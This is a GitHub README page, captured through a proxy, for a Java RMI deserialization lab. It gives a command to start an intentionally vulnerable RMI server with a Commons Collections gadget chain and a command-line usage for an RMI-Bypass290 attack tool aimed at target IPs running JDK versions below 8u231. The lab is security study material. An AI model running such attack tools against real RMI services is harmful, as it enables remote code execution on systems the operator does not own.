Skip to content

lalajun/RMIDeserialize

Repository files navigation

RMIDeserialize

RMI反序列化学习环境,细节请参考博客RMI-反序列化-深入-上RMI-反序列化-深入-下

java -cp RMIDeserialize.jar com.lala.ServerAndRegister :起一个包含CC链可以被攻击的RMI服务

java -jar RMI-Bypass290.jar <攻击目标IP> <攻击目标端口> <本地JRMP服务IP> <本地JRMP服务端口>:攻击目标8u231版本以下的RMI服务。

其他功能可以从源码运行。

总结图.png

About

RMI 反序列化环境 一步步

Resources

Stars

Watchers

Forks

Packages

No packages published

Languages

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy